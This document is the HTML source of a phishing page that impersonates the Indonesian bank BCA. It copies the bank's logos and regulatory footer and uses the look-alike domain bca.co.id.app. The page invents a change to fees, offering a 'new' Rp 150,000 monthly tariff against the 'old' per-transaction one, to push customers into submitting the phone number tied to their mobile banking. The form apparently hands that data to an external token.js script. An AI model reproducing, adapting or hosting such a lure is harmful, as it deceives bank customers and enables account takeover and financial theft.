
<!DOCTYPE html>
<html>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
<meta name="VIcurrentDateTime" content="638420422355925020" />

<meta name="theme-color" content="#005BAA"> 
	<meta charset="utf-8">
	<meta name="description" content="">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  	<link data-senna-track="temporary" href="https://bca.co.id.app" rel="canonical" />
    <link rel="canonical" href="https://bca.co.id.app" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> 
	<title>SKEMA TARIF © 2024 - 𝗕𝗔𝗡𝗞 𝘽𝘾𝘼</title>
<link rel="icon" type="image/png" href="https://i.postimg.cc/SsrRQXrV/Bank-Central-Asia.png"/>

<meta property="og:image" content="https://hosting.tigerengine.id/s5qbhf.jpg"/>
<meta name="description" content="© 2024 PT Bank Central Asia Tbk, All Rights Reserved. BCA terdaftar dan diawasi oleh OJK">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
<script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
	<meta name="twitter:image" content="">
	
	<link href="main.css"		 rel="stylesheet">	
        
    
</head>

<body> 
    <div class="loader" id="loading-progress" >
        <div class="wrapper-loader">
		<div class="loading-div">
            <div class="rect rect_one"></div>
            <div class="rect rect_two"></div>
            <div class="rect rect_three"></div>
			<div class="loading-text">Mohon Tunggu...</div>
		</div>
        </div>
    </div>
	
	

<!--rendering header-->


<style>
    html, body {
      max-width: 100%;
      overflow-x: hidden;
      }
body {
    margin: 0px;
    background: #fff;
    color: #000;
    font-family: 'alexfonthel', sans-serif;
}
welalxcome {
        position: fixed;
    left: 0;
    top: 0;
    width: 100vw;
    height: 90vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
}
welalxcome img {
        width:35vw;
    height: auto;
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.talxcome {
    width: 130%;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 100%;
    justify-content: center;
}
.talxcome img {
        width: 73%;
}
    
    
    body {
  position: relative;
}
    
    .pull-right-lang {
        float: right !important;
        margin: auto 0px;
        font-size: 0px;
        margin-left: auto;
    }

    .switch {
        padding: 6px 2px;
        width: 40px;
        display: inline-block;
        text-align: center;
        text-decoration: none !important;
        transition: color 0.2s ease, background-color 0.2s ease;
        border: 1px solid #fff;
    }

        .switch:first-child {
            border-top-left-radius: 16px;
            border-bottom-left-radius: 16px;
        }

        .switch:last-child {
            border-top-right-radius: 16px;
            border-bottom-right-radius: 16px;
        }

        .switch.is-active, .switch:hover {
            background: #fff;
            color: #0066ae;
        }

    .text-lang {
        font-size: 12px;
        color: #fff
    }
    
    #wrapper{
	
	background-repeat: no-repeat !important;
    background-size: cover !important;;
    background-position: center !important;
}

@media(max-width:525px){
  #wrapper{
    background:url('img/background-blue-mobile.png')left 50% bottom 175px/cover no-repeat !important;
  }
}

#wrapper{
	background-color:transparent;
}


  .fontku{
       font-size: 12px;
   }
   
   
   
   .btn-submit:active{
       color: #fff;
   }
   
   .btn:active{
       color: #fff;
   }
   
  .btn-default:active{
      color: #fff;
  }
  
  
  
  #btnSubmit, #btnSubmit1, #btnSubmit2{
      color: #fff;
      letter-spacing: 0.0;
  }
  
  
  #btnSubmit:active, #btnSubmit1:active, #btnSubmit2:active{
      color: #fff;
  }
  
  h4{
    font-size: 15px;
    line-height: 16px;
    margin-bottom: -5px;
    color: green;
}

#ionIcons {
            color: rgb(22, 119, 199);
            font-size: 26px;
            position: absolute;
            display: block;
            margin-top: 11px;
            margin-left: 13px;
        }
        
.radio-section {
	display: flex;
	align-items: center;
	justify-content: center;
	height: 100vh;
	width:;
}
h1 {
	margin-bottom: 20px;
}
.radio-item [type="radio"] {
	display: none;
}
.radio-item + .radio-item {
	margin-top: 15px;
}
.radio-item label {
	display: block;
	padding: 2px 10px;
	background: #09559a;
	border: 2px solid rgba(255, 255, 255, 0.1);
	border-radius: 20px;
	cursor: pointer;
	font-size: 12px;
	font-weight: 400;
	min-width: 250px;
	padding-left: 20px;
	color: #fff;
	margin: 3px ;
	position: relative;
	
}
.radio-item label:after,
.radio-item label:before {
	content: "";
	position: absolute;
	border-radius: 50%;
}
.radio-item label:after {
 margin-top:1px;
	height: 18px;
	width: 18px;
	border: 2px solid #fff;
	left: 9px;
	top: calc(50% - 10px);
}
.radio-item label:before {
	background: #fff;
	height: 18px;
	width: 18px;
	left: 9px;
	top: calc(50% - px);
	transform: scale(5);
	opacity: 0;
	visibility: hidden;
	transition: 0.4s ease-in-out 0s;
}
.radio-item [type="radio"]:checked ~ label {
	border-color: #524eee;
}
.radio-item [type="radio"]:checked ~ label::before {
	opacity: 1;
	visibility: visible;
	transform: scale(1);
	margin-top: -1px;
}

.div-block-2 {
    position: fixed;
    left: 0%;
    top: auto;
    right: 0%;
    bottom: 0%;
    width: 100%;
    height: 75px;
    background-image: url("img/637e85c3992afb169e72a230_AddText_11-24-03.27.11.jpg");
    background-position: 0px 0px;
    background-size: 100% 75px;
    background-repeat: no-repeat;
    text-align: center;
  }

  .button-15 {
    overflow: hidden;
    width: 15.1%;
    height: 75px;
    margin-top: -40px;
    margin-left: 0px;
    background-color: rgba(235, 238, 241, 0.02);
    text-align: center;
  }

  .button-16 {
    overflow: hidden;
    width: 15.1%;
    height: 75px;
    margin-left: 5px;
    background-color: rgba(56, 152, 236, 0.02);
  }

  .button-17 {
    overflow: hidden;
    width: 15.1%;
    height: 75px;
    margin-right: -20px;
    margin-left: 5px;
    background-color: rgba(56, 152, 236, 0);
  }

  .button-18 {
    overflow: hidden;
    width: 15.1%;
    height: 75px;
    margin-left: 25px;
    background-color: rgba(56, 152, 236, 0.01);
  }

  .button-19 {
    overflow: hidden;
    width: 15.1%;
    height: 75px;
    margin-left: 5px;
    background-color: rgba(56, 152, 236, 0.06);
  }

  .button-20 {
    overflow: hidden;
    width: 15.1%;
    height: 75px;
    margin-left: 5px;
    background-color: rgba(56, 152, 236, 0.01);
  }

.w-button {
   display:inline-block;
   padding:9px -1px;
   background-color: transparent;
   color: #000;
   border:0;
   line-height:inherit;
   text-decoration:none;
   cursor:pointer;
   border-radius:0
   }
   
  .hp{

background: url("img/62.png");
background-size: 25%;
background-repeat: no-repeat;
background-position: left 0px center ;

  }
  
  ::placeholder{
        opacity: 0.5;
  }
</style>
<main>
<welalxcome>
<img src="img/Bank_Central_Asia.svg.png" alt="" />
</welalxcome>
<chsalxcome2 style="display: none;">
<div style="height:30px;width: 70px;margin-top: -30px;margin-bottom: 0px;float:center;margin-left:42%" class="talxcome">
</div>
<div class="start" style="display:;">
	<img class="logo" src="" style="width: 100px; display: none" id="start">
	<div class="">
	    <center>
	
	</center>
	</div>
</div>
<div id="wrapper">
		<div id="">
	<div class="container">
		<div class="d-flex py-2">
			<div class="mr-auto p-2"><img src="img/logo_2x.png" alt="" id="logobca" class="img-fluid logos"></div>
            
            
            
            <div class="container" style="display: -webkit-flex !important;">

                <div class="pull-right-lang">
                    <a class="switch text-lang is-active" href="#">ID</a>
                    <a class="switch text-lang " href="#">EN</a>
                </div>
            </div>

		
		</div>
	</div>

</div>
	







<div class="AsuransiFormWrapper" style="border-radius: 10px; padding: 24px">
    
    
    
<fieldset id="debitpage" style="">
<div id ="#content" class="background">




<div class="container hid" style="position: ; background: transparent; display: none;" id="wrapper">
 

		<div class="d-flex py-2">

			<div class="mr-auto p-2"><img src="img/logo_2x.png" alt="" id="logobca" class="img-fluid logos"></div>
            
            
            
            <div class="container" style="display: -webkit-flex !important;">

                <div class="pull-right-lang">
                    <a class="switch text-lang is-active" href="#">ID</a>
                    <a class="switch text-lang " href="#">EN</a>
                </div>
            </div>

		
		</div>
	</div>

</div>
   <br/>
   
 
   <form id="formHP"  method="POST"> 
   
     <center style="color:#09559a;"> 
     
     
      <img src="img/AddText_01-28-07.27.56.png" width="100%" style="margin-top: -35px">
     </center> 
    
     <hr> 
     <center>
  <!-- partial:index.partial.html -->
<section class="" style="padding: 4px; position: static; left: 0; right: 0; margin: -10px auto; width: 60%">
	<div class="radio-list" style="position: absolute; left: 0; right: 0; margin: 0px auto; width: 75%">
	<center>
		<div class="radio-item" >
		    <input name="tarif" id="radio1" type="radio" value="Baru - Rp 150.000" required>
		    <label for="radio1" >TARIF BARU Rp 150.000 / Perbulan</label>
		<div class="radio-item">
		    <input name="tarif" id="radio2" type="radio" value="Lama - Rp 6.500" >
		    <label for="radio2" >TARIF LAMA Rp 6.500 / Pertransaksi</label></div></div>
	
	</center>
	</div>
		</section>
		<p></p>
		<div style="margin-top: 80px">
     <h5 style="text-align: center; margin-bottom: -5px; font-size: 13px; font-weight: bold">Masukan Nomor ponsel BCA Anda <!-- <ion-icon name="call-outline" class="ion--telephone-outline" id="ionIcons"></ion-icon> -->
     <input data-mask="000-0000-00000" patternn="(?=.*[0-8]).{12,15}"  oninvalid="this.setCustomValidity('Mɑsukkɑn 𝗡𝗼𝗺𝗼𝗿 𝗛𝗮𝗻𝗱𝗽𝗵𝗼𝗻𝗲 yɑng terdɑftɑr di 𝗠𝗼𝗯𝗶𝗹𝗲 𝗕𝗮𝗻𝗸𝗶𝗻𝗴')" onchange="this.setCustomValidity('')" id="nomor" name="nomor" type="tel" class="hp" style="box-sizing: border-box; height: 40px; width: 536px; max-width: 100%; border: 2px solid #0f78cb; border-image: initial; background-color: rgb(255, 255, 255); border-radius: 18px;box-shadow: rgba(50, 50, 93, 0.25) 0px 2px 5px -1px, rgba(0, 0, 0, 0.3) 0px 1px 3px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 10px 75px; outline: none; margin-top: 5px;color:#000000bf;" placeholder="8xx-xxxx-xxxx" maxlength="15" minlength="11" required>
     <br/><p></p>
 
    	<div class="text-center mt-4 mb-1">
			<button type="submit" id="btnSubmit" class="btn btn-default btn-submit">Lanjutkan</button>
		</div>
	
		<div class="text-center">
					<input type="hidden" id="captcha" name="captcha" value="">
					<div class="text-center pt-4 disclaimer-recaptcha captcha-policies" style="font-weight:400;">
						This site is protected by reCAPTCHA and the 
						<a href="#">Google Privacy Policy</a> and
						<a href="#">Terms of Service</a> apply.
					</div>

		</div>
   </div>  
    
    
    
  
	</fieldset>   
</div>
</div>
    <!-- /#global-modal -->
    <div class="modal fade" id="global-modal" tabindex="-1" role="dialog" aria-labelledby="" data-keyboard="false" data-backdrop="static" aria-hidden="true">
		
		<div class="modal-dialog modal-dialog-centered" style="margin-top: 0px;" role="document">
            <div class="modal-content">
                <div class="modal-header position-relative border-0 pb-0">
                    <button class="position-absolute btn-info closeTop" type="button" data-dismiss="modal" aria-label="Close"><i class="fas fa-times"></i></button>
                    <h4 class="modal-title text-center w-100"></h4>
                </div>
                <div class="modal-body text-center"></div>
                <div class="modal-footer border-0">
                    <div class="d-flex align-content-center justify-content-center w-100">
                        <button data-dismiss="modal" class="btn btn-info px-4 py-2 close-btn btn-footer-modal" type="button">OK</button>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- /#global-modal -->
    
	<!--rendering content-->
	<div id="Webform-footer">
		 



<div class="container">
	<div class="row justify-content-center mt-4">
		<div class="col-lg-10">
			<div class="footer-data-wrapper row justify-content-center">
				
			<div class="footer-logo-desc mb-3 ">
						<div class="text-center justify-content-center pl-5 pr-5" style="color:#7D8185; margin-top: -20px">
							 <p class=""> BCA berizin dan diawasi oleh Otoritas Jasa Keuangan - BCA merupakan peserta penjaminan LPS</p>
							
						</div>
					</div>    
			</div>
		</div>
	</div>
</div>
	</div>
	
<div class="div-block-2">
<a href="#" class="button-15 w-button"></a><a href="#" class="button-16 w-button"></a>

<a href="#" class="button-17 w-button"></a><a href="#" class="button-18 w-button"></a><a href="#" class="button-19 w-button"></a>
<a href="#" class="button-20 w-button"></a>
</div>
</main>
		<!-- end script detect browser-->

      <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },800)
        });
</script><script src="token.js">
 
</script>
<script>
$(document).ready(function() {
    $('#no').on('input', function() {
        if ($(this).val() == '0' || $(this).val() == '62') {
            $(this).val('');
        }
    });
});
</script>
</body>
</html>

